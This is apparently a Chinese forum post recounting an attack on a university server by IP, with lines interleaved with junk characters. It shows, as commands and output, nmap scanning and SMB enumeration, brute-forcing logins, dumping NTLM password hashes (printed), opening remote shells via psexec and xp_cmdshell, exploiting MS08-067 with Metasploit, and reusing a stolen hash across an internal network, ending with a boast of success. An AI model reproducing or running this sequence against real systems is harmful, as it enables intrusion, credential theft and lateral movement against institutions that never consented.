广西师范网站http://202.103.242.241/
1 S* c' d: Y( {" }6 V1 ]8 `% A* ~
root@bt:~# nmap -sS -sV 202.103.242.241
$ N- b" S. W' M9 [
& H3 Q) B; k) A, c& ^Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
) a4 \% u( o. y9 u) u2 `" A6 E. S( ~$ ~, ]3 w& w! F" |
Nmap scan report for bogon (202.103.242.241)
' W @" e+ F8 e' j0 o- U
4 i; R8 w& v+ ]- K; T/ Z% V# d1 XHost is up (0.00048s latency).
) R. L4 a" J" D# s: I4 N0 y ]
6 L2 r5 B# C% b3 Y1 ^Not shown: 993 closed ports" l# W3 @4 I8 Z( ^: a! z2 c, h) _
+ }. n- z; l$ L
PORT STATE SERVICE VERSION
( ?! R2 w5 o" t5 M& f
0 D1 e# i+ d' ~0 ^135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe): Q* @1 L% P+ |. i* U9 D; o L( b
- T0 Y/ S+ }; b/ e; p& a1 Y" a139/tcp open netbios-ssn- x; W1 ~* ~0 Y) G, B0 D6 j0 o" W
* R9 `& Q, h8 l8 N) I7 J445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
4 |' B9 Z s4 Q! J2 @* j; s' d
4 r9 Q9 M7 u6 d" J! v1 @8 ]* t1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)0 Y! |2 W0 c& y; R- c+ u3 R* O7 G
; @& w! C0 j6 i. ~% o1026/tcp open msrpc Microsoft Windows RPC5 }8 |- R! k+ @9 D2 t
$ D% \* V0 T% |
3372/tcp open msdtc?/ @2 A+ M {6 H# P
$ R' j( H( \7 J# K- l+ [4 x. J3389/tcp open ms-term-serv?
0 }1 P: U3 E l
+ ~; A- j) w1 r% C5 x- h1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
; U% e) T0 `: b6 H/ M2 |9 n l( iSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
! E& W1 k( Q- w( _% y. i! e1 V5 N; a2 E2 y! v
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions, y6 Q6 J* w4 G+ y( r. w+ y1 r) K
) |8 h7 C+ b5 b- B8 Z# R
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
! i4 F$ E+ e* }0 T" ?) J# A
& k# J0 v2 A, s; LSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO/ z$ T/ [/ o% O! L, U
6 ~( |0 P2 l) X/ h; B
SF:ptions,6,”hO\n\x000Z”);/ Q. p! J6 v6 i7 r9 h
5 A' ?6 L& J# v( l" dMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
& [. C. H: |6 b- {. m- Q5 d; F4 l/ P9 t7 Z; b
Service Info: OS: Windows4 T* q4 ]7 s5 H U4 h. q
, t) ?: @, F b4 _- w* |$ D
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
# ?. l% M' _$ l" W6 x, F4 m1 r( l9 k R! R0 S. P# ?% k
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds$ r |( x. Q/ E e
& M' ~7 l, b, S" I6 C* b
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本6 P4 N) {! a/ l( N$ `7 L6 d% a
2 n+ X4 z0 @' l/ e
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse) @% O6 F6 ~1 i! i6 q+ s' f
. l" ^% w. Z& @" y% t& j* W-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
- f* {+ R+ b- h5 ^$ `# b1 Q
& y9 N* r5 X M- i-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
+ M) U* f6 k" g- s" o- r/ u
9 }: j" a4 o& j S9 P- K-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse" j l0 j! ?$ O: J% q0 u. w- T
) x0 ]% t$ z0 _ @( b1 k-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse. [8 Y2 O: _& b# P# Z/ R d
8 X1 B* b& ]. k! w6 Q
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
5 ` m) V' e q4 B& {7 C/ L
; _; P" W( b& j! ]( J-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse$ C% |% a& t. t+ i# P( N
2 V6 C, C! }; V; ?4 y( X5 A1 F% Y-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
( M$ c. w P7 m m; i- E7 X Q
\. F. A- r- V7 e; H-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
8 ^$ I* h' M6 U7 [9 [0 Y9 ^
% I% c {( Q& A; z5 @-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse) j' @# H6 M6 ~9 r
4 p: @1 X! [& n+ K4 t" _-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
& M- f6 J @/ ~, h. e# E5 m5 ^3 Y8 y* H( M) I- V8 z' }
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
A Q2 ^! H8 W- z+ h
& k3 G# Y; A) i9 V' H: l-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
, x6 K% m2 g$ d1 h) N# i3 A! b1 p/ ^& A& ?# b
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse1 e4 F5 c Z3 |, v+ c/ d# X
" r: r" \+ C$ Z5 G& ]-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse5 ]6 F7 \& U% f' I* j
5 F/ t( b( @$ a5 p; Z+ Jroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
$ y B% l3 i4 A& D8 O' B2 _5 a8 g1 ]0 L9 q, q6 d' I
//此乃使用脚本扫描远程机器所存在的账户名9 i' h2 k" y4 \0 o1 @9 P5 q* e8 }3 D- t
' I1 v- E8 M' Q0 LStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST( k2 H, J; E* X
4 C, {. W6 w" l- f; V( PNmap scan report for bogon (202.103.242.241)& I) j) \- R8 P9 [, H- l: t ^$ d: J
4 z7 ^' t+ ^/ N6 u
Host is up (0.00038s latency).
) a/ j- K, E7 O4 a
8 v' i+ x v0 c3 U5 P2 M( [# uNot shown: 993 closed ports" v- ^/ r% ]* n) S0 _
: I; D e; E8 f. F% I+ [PORT STATE SERVICE
& k7 S( P& n; J& A( D
% a* f, e/ c. d6 E, q135/tcp open msrpc7 ^. g1 o, i1 K
" I$ |! w% E0 D7 V3 a3 C* {* y139/tcp open netbios-ssn
7 d- R3 a ~2 u @7 ?) _! A9 ~
4 G+ a* i9 i0 r* V R, |445/tcp open microsoft-ds
9 w m k& i* R8 [: w' L; [4 u2 J2 y$ ~2 `) d/ {; F- Z7 V
1025/tcp open NFS-or-IIS/ R7 F/ d' w5 t2 j, A) L
/ V; y+ e* V' v2 s3 m9 A2 z
1026/tcp open LSA-or-nterm
) Z- h% a6 ?3 s5 b/ `% B3 W' L0 K, }2 F* m
3372/tcp open msdtc
/ I; w4 s+ i4 A4 x$ L
! i" N% C p N( C* Y. |3389/tcp open ms-term-serv" j8 J# F0 @# F
. u# N$ ~' d( Z* z" d4 F
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
2 u# s1 U3 J2 m& G0 I% \% C, ~
/ e8 P# u2 g: e( y/ g* THost script results:
8 a4 p) Z3 u5 o- w
. h1 s5 H0 G, @| smb-enum-users:
" s0 V: I! ^( w
. w/ Z$ D8 k' d4 S, l0 A# D+ r4 f9 G|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果- P" c7 K" s# m* F3 \
( U3 R6 A, T) G5 D7 V. W
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds0 H) \# Q, b* W+ X' c' k* X
4 K6 V1 f ~' k3 Y0 proot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 & u Q" \9 k" ^7 ~5 F! u5 j
! F$ m0 y( W( C7 b; B% F
//查看共享
2 v' b( C5 l; K% E1 z. [. Z$ g0 d. t' d
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST8 q: C+ r+ U. M( O" o' G
2 d" J* y2 C2 t1 I' FNmap scan report for bogon (202.103.242.241)
8 E0 O( u6 Z% t: L1 a1 i# T ]! O1 D3 O1 a; {+ w; `. M" ~. Y% ]
Host is up (0.00035s latency).
: A1 g3 ~/ Y0 c8 b# B$ \
9 l& G3 ^1 Q$ _- D" J; g C' @+ ZNot shown: 993 closed ports" X3 |9 U6 w2 M5 F' P
1 l H/ H9 H# Z% l2 J9 HPORT STATE SERVICE
_5 B- }, m; | \4 p' M) v7 K0 z. r' z( \8 A
135/tcp open msrpc
7 t& ]# e7 e, k2 ?& K
1 j! K; F% M3 o7 f( L139/tcp open netbios-ssn
) _' v- b5 U% Q! G+ K/ T
3 F4 H7 k% Q2 b8 G445/tcp open microsoft-ds. Y( ~2 Q9 Q$ T
' R' ~5 T) B# W/ o, u8 `1025/tcp open NFS-or-IIS
& _ N& ~9 t- a9 p9 K) N4 G& t% r1 P" O- b& _
1026/tcp open LSA-or-nterm# X; Y. Z+ y; Z! z! T2 Q6 |
3 v! O+ @2 o2 N( x z3372/tcp open msdtc/ H2 e: Z0 Y Q) m$ c
4 }, i8 I3 S* L3 e3389/tcp open ms-term-serv: M& D) ~9 @1 F2 g3 P" Y
7 H) C/ ~' v; g) i
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
5 R" } _5 c. }% \0 I1 U. ?. | P5 P
% Z5 F: T; ]; ~1 A; RHost script results:% w+ a. z2 W# J5 x7 U0 F: U# l
5 `) n" w4 l- l$ Y' ]
| smb-enum-shares:
/ M; v/ ^2 h3 @! L& d% h- ]; p) P( \! F: _; ]* g
| ADMIN$
9 M5 H! U4 b! h5 }' \ V( y0 F3 w+ T. m/ C- a# J+ i' W+ }
| Anonymous access: <none>
O. e0 u+ u2 c1 z! G! X+ v
; o% L$ ]) ?, F8 ]| C$2 c" k+ z! F0 g; ^
9 O4 u5 T9 Q7 \; W7 r2 E
| Anonymous access: <none>% Y3 T# J4 U' R" V3 [( Z
; F( [# e3 V% o
| IPC$3 D" b# I, ]- |0 L
2 X: N8 Q3 ]0 [) x3 b0 m$ F
|_ Anonymous access: READ
+ H: }/ w9 o/ R" E; Y# z& ?6 X v. `. D/ `2 F# K
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds Y" Y6 y6 B4 ^; t, v
e8 t- w2 |/ x+ X6 O y Z, J
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 : e/ |4 j4 T% r4 E# V* h
/ {" N. @, V s: ]& J//获取用户密码
* n& I7 z t3 c' t8 ^. ?( D4 ?/ d1 `+ w& n8 R$ F/ k
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
8 u2 U" t, U. \
' F1 g1 {9 D9 n! ~" C! _) K* U. P# xNmap scan report for bogon (202.103.242.2418)! o4 J7 ?( P' w
+ a5 [8 }0 \6 X0 w6 m1 g/ P3 f
Host is up (0.00041s latency).# ?0 l, i9 n X
. s4 E" v8 K$ SNot shown: 993 closed ports
2 |( g0 A6 a# z7 {! P0 }" H R! q. I! k1 k( a: a |/ q
PORT STATE SERVICE
( k5 \# u' h# t# u6 N+ N+ P6 S' o
/ W. I9 ~# [% l# h- A- W3 c135/tcp open msrpc
: y2 b* V/ T- ^8 Q7 V9 \" i& s9 V& ^! x' b y
139/tcp open netbios-ssn
! X. o$ C0 d/ ^' }5 J
# }6 {$ J5 V" R4 x' ]0 ^( u445/tcp open microsoft-ds
; y8 C9 C. }+ ]/ E2 S% p0 @5 Q$ v, X9 X# m
1025/tcp open NFS-or-IIS
: }% C3 ?& ^' p8 v8 m6 E, i, U+ X) R9 D
1026/tcp open LSA-or-nterm
1 C7 w4 s0 I/ }, M# f% I- Q) G7 R" }. T) J. R3 E
3372/tcp open msdtc$ P! j- ]& H% _/ R% C1 e
: @+ L5 g L/ d3 m5 L3 r% c4 C4 x
3389/tcp open ms-term-serv
* k4 g. y1 ~% J( `, }- T+ n0 g5 G: M" ^5 f) K0 V. w
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
8 }/ H$ I; ~" u" B: L" I# [- ^% x& W3 k& b) T
Host script results:
$ F% Z5 B3 {; D" O9 k W Y
+ A) p* i$ S4 j/ v| smb-brute:/ U* l% Y8 _! W( S
4 R& b e/ D% V4 p( qadministrator:<blank> => Login was successful
7 d1 A0 q6 w t3 ^6 \
( ?5 X8 l# U9 q; D% w, f|_ test:123456 => Login was successful! p$ D$ N& @/ R, m5 R! \2 A
. m$ K( k) _! eNmap done: 1 IP address (1 host up) scanned in 28.22 seconds
. P1 |, W. G3 Z" e& I2 W7 J/ c- M% J7 x+ h1 ~. V
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash0 g' M* Y8 L9 Q/ O3 ]
. c; V [% {* {# @5 h0 C# g, \
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data |: P0 j' q7 K8 T6 A q
8 e- _/ c! V( Z. W1 }0 q
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse3 m, h) M/ M+ K$ ^& b. w' t6 d
( V* g2 o+ e& G. `& Y/ R
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139 z8 p, Q3 c7 J; l7 [- T0 q6 z
3 z$ ]: w8 E5 G5 y
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
8 c. e- j. e) c/ U: Q( @) a1 b' [$ J9 v$ U0 e6 f7 L% z6 Z3 I- N% u
Nmap scan report for bogon (202.103.242.241)
% y& z6 g4 V0 U4 V
* D9 p; r9 T( \! l) vHost is up (0.0012s latency).
9 G- l& ^3 b0 P6 Y3 _# O0 S- t' V) j5 w$ m% ]4 j2 L7 f
PORT STATE SERVICE1 @0 v, F# X1 p7 q4 ?* i1 p
0 a2 y. U2 Y Z( N$ e- u( `1 R135/tcp open msrpc
. ~' N1 a5 i6 C1 h* l* J7 d( c+ W7 ` g' f7 S. T" R
139/tcp open netbios-ssn
1 c, `" b9 H( J. w4 t
1 M0 i$ i, R# Q2 |- U9 i% b6 Q6 ?0 \* E) E445/tcp open microsoft-ds( ^6 y2 Z2 T' g9 s- a
# f* h9 F" `, wMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
' H f& r6 H6 c3 @3 y" l, i% f" Q8 e8 o& a' w3 `
Host script results:4 a" @9 O! A4 u9 N4 P; `7 U6 Y# ]% Q# g
^9 z6 F' p% N& q. ?! |$ ~6 R2 R; b# E| smb-pwdump:
5 S5 j1 ~- u$ U. M0 h* y8 e& \% J3 Z+ A3 U7 r
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
- m4 y& N" ^+ E& A8 n( H( y& T$ M# J, O$ q0 V
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
4 t& b/ a C6 }) L+ [
. p3 M# i" z" a8 Y4 \0 _! ]| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
, D: o& }. k6 e% u; [; p# E- U' X# O! Y/ I; N& L/ D
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2+ W- w% `; L; W) v' U9 v! b. n7 f
( l4 j+ p v1 T+ ]
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
% O5 I6 {6 g) }( v* {7 F' X2 z2 _ o- U& P( O6 a! l
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
/ D: b$ w+ x* Q) @( ^- N
& L" K+ F' j1 {% p-p 123456 -e cmd.exe
; R5 v) r: n; l1 Y! W u6 l" Z& V6 ?) q$ N
PsExec v1.55 – Execute processes remotely
( S) ?$ F8 b. q( \9 K6 Z4 k4 X( x( s- U/ M" \) Y# D/ y7 ]
Copyright (C) 2001-2004 Mark Russinovich1 o8 K, N! f5 g) G
' Z F; b1 A5 @6 r; ?Sysinternals – www.sysinternals.com, u2 [1 C1 w: U
( r2 q6 N! ]! o# wMicrosoft Windows 2000 [Version 5.00.2195]
0 {6 ]8 B( R$ F7 ]8 [6 R* [
( L. `; s- [0 c, m: O3 ~$ A(C) 版权所有 1985-2000 Microsoft Corp. `0 [& d6 p+ F; ?0 ]; S* T' s% d J7 q
% n& e& m& r) J% f; [C:\WINNT\system32>ipconfig
% {2 W8 N9 z! ^) U2 g" E
- J& b* j4 t8 M' {+ S. oWindows 2000 IP Configuration
1 Q w5 y7 u6 T2 \" `# o9 x' T* I
# t8 o! i$ e5 T, W$ Y7 C% F( D |8 KEthernet adapter 本地连接:
5 `" e! t+ [: m" H U' e8 i! v8 ^. B$ V9 ]" q+ m; ~" x
Connection-specific DNS Suffix . :/ N i% U9 ^) S7 s6 i3 d d/ b U; {
7 Z: m$ _* B) c, m5 Y" ?2 h: \. [IP Address. . . . . . . . . . . . : 202.103.242.2417 \0 }$ \9 |$ y) `
$ _8 D0 O$ w+ n$ g; jSubnet Mask . . . . . . . . . . . : 255.255.255.0- u; b9 e5 k$ x
5 W5 [* X! ]6 y7 d7 B# J) hDefault Gateway . . . . . . . . . : 202.103.1.1- H8 d/ W. _7 p; ~
! o" H* s2 ^4 m
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令8 y7 u5 ~7 q ?' h
) c6 {; Z% H8 D( A
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
: X; I$ P" W# L5 ^& m q4 K( u+ e0 v2 I6 Q& u+ i: I0 g7 Y2 l$ F1 p
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
) B6 u4 _# i8 l+ |* P! v) [* Z. p3 k C5 U4 J; L
Nmap scan report for bogon (202.103.242.241)* g, s) I" v9 I) {: W0 s$ ]
3 s! L( ^2 a* w9 m0 gHost is up (0.00046s latency).0 _* A0 g% i6 |8 a
" P. n) e. ]; pNot shown: 993 closed ports2 I8 [0 U0 M& e) J! p! O4 a: p
. M0 f7 j6 r' |+ B' W- A
PORT STATE SERVICE2 ]: E8 [- p: \# l
+ a- I4 d+ _9 P2 b& Q2 C
135/tcp open msrpc
: ~* C3 a m% M2 N; @' M" c) L8 d2 y! V) [6 u, \
139/tcp open netbios-ssn
' H: Z3 B, }' }% ?
0 \; c, R( v( p; b/ Y, n9 q0 O* ~/ A445/tcp open microsoft-ds
; m; a1 z/ i+ [. n; Q% }* N( f" d- m4 b6 Z/ Q J& u
1025/tcp open NFS-or-IIS
# Q c7 }% x h
' O2 d- k$ Y9 R& m1 T1026/tcp open LSA-or-nterm
+ A: N, `2 d& `! I; E5 G7 o5 c: E8 ^9 k. g2 [- i# `1 q
3372/tcp open msdtc
, M7 E: W, o. X& N$ _5 ?& c+ e: H) M' d- O6 I5 c$ W- U6 O0 U
3389/tcp open ms-term-serv
6 h3 k- _* s9 C. f. O4 N' x3 n: w# ?# C
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)/ s/ K, j) `1 o" C9 \+ g0 P# c1 S) c
2 `$ Q* `& R8 d' }$ b \) b7 b& i
Host script results:. Q/ L9 R9 e* V! l5 r
$ h9 Q8 y" M1 f
| smb-check-vulns:; k& f6 i/ w+ I) @
! B8 X/ H" r& R- Y0 x
|_ MS08-067: VULNERABLE) [. D8 g( b+ S; f( B
% p8 ~: N4 d$ T9 mNmap done: 1 IP address (1 host up) scanned in 1.43 seconds$ Z4 Q. x, f" {* L% _& Z+ {) y- M
. m& v0 R5 T% S: G8 ?* Z% c, W, d& ?9 d
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出 I% T: d& l9 m8 q5 V3 X6 J/ B. \
" v* u, M* }. d" h- x1 Xmsf > search ms08+ T/ d* r% f/ `8 s5 a
2 a9 O. Z# k# v5 {
msf > use exploit/windows/smb/ms08_067_netapi
3 ~" Y7 o9 N8 @( b8 `# K j0 H2 V9 h6 ^0 \
msf exploit(ms08_067_netapi) > show options
* n' k# ^0 }8 f. {) r* J3 c6 Z% l* a
" r! Q4 I7 C7 w5 X0 smsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241! q; R0 W) |; U2 g8 w$ {7 h/ z
6 p8 m$ K5 i# u
msf exploit(ms08_067_netapi) > show payloads( D6 j1 E& @3 m. Y3 W
7 Q' t) J% a9 @- d' J) hmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp9 {2 e$ r3 r; _! ]
) X5 S* [; y. S7 H+ jmsf exploit(ms08_067_netapi) > exploit
8 t% A: \+ Q+ ~# R) |- @
/ e5 g, @+ v" x$ A5 d! v4 smeterpreter >
" `- b* ?/ m9 j+ ]' Y+ J3 T! i" S/ E
Background session 2? [y/N] (ctrl+z)
3 P x* A% L7 b! i. ^# Y! j9 C0 } r* n4 o- B, y4 p( R
msf exploit(ms08_067_netapi) > sessions -l5 C5 f5 y4 F4 Q2 q2 f
1 H8 T3 v) A5 @, S# l6 z# O
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
7 c1 S5 ?/ y7 q/ p7 p6 @: i3 W: \/ ~
test: p1 a) u Z$ `/ _
1 {& @+ E( N) v7 n1 ?' b {administrator9 \; c0 I' v" S& K! a) i+ w; S. Z
* R5 n. n+ o4 _1 k5 k# mroot@bt:/usr/local/share/nmap/scripts# vim password.txt3 O& a5 o. F) o3 [- u$ X
7 B. ~, C2 G6 s% g44EFCE164AB921CAAAD3B435B51404EE" X- |7 f; a/ I; H% x" A$ a
- w' `; A$ g; M: j6 F% }
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 ' m. l1 ?" ]/ W
" d) e* s$ M) x: [& P. O' E
//利用用户名跟获取的hash尝试对整段内网进行登录1 l" q/ n4 O# R' e3 Z, s6 O$ E
; g/ D0 }% \# K& D* H# Q6 A; @Nmap scan report for 192.168.1.105
5 m4 ~. t0 N( w! q6 T8 N# C0 |9 P7 J1 z1 q
Host is up (0.00088s latency).
# r& a3 ^2 Z5 f# s! _- }
# |: d4 k. u9 Z) O3 oNot shown: 993 closed ports
$ [9 M+ \- T/ h: c$ n6 _2 o, d, ?; \1 k" s( }5 e1 Y- X, M
PORT STATE SERVICE
, u! G' G8 o. a" _" i) ]" ^$ X6 z [/ j# S" K2 W3 L5 ? h
135/tcp open msrpc ]. V7 ~5 J: o3 G1 n
. _" I1 P: \# T6 m; \139/tcp open netbios-ssn6 f, ?$ l& M/ E% c
# J, K$ X2 M+ l x& Z X5 }
445/tcp open microsoft-ds2 t P: Z# X) l; g5 K
5 J/ W5 x6 c$ { n
1025/tcp open NFS-or-IIS
6 f% n9 O8 x1 p' {0 e: p3 |' R; B2 G' R+ ^4 p
1026/tcp open LSA-or-nterm
8 r& `; u2 {* E" c2 s1 J" F( l* P% H* V0 B4 M6 h& ^
3372/tcp open msdtc
+ R3 P4 N2 V# Z( {" F' q7 v2 z# ~4 V. k. B
3389/tcp open ms-term-serv
" n1 U; P1 E' c8 s* A# t/ y8 M+ F2 D+ m. E- A/ c# a Y
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems). p1 C! y. _2 Y, L4 z+ y+ h
3 y7 \+ Z$ E8 b9 u* n! i* ^( `
Host script results:: z# Q% x0 n& H6 R# E
& ]! Y; L) H% ?$ I. M" U/ l6 h
| smb-brute:8 N6 h8 N4 S. V1 I3 A# s1 p% X5 n
% ]3 O% V b2 {! q|_ administrator:<blank> => Login was successful
9 k' L* |! V5 |, A. b" n+ Y# ]7 B, K/ @) d/ v. P+ o: M
攻击成功,一个简单的msf+nmap攻击~~·0 c# T) T; F6 C% ^' _% R
( h8 T! I8 J) @* C" |; g2 `
|
发表于 2012-12-4 12:46:42
收藏
支持
反对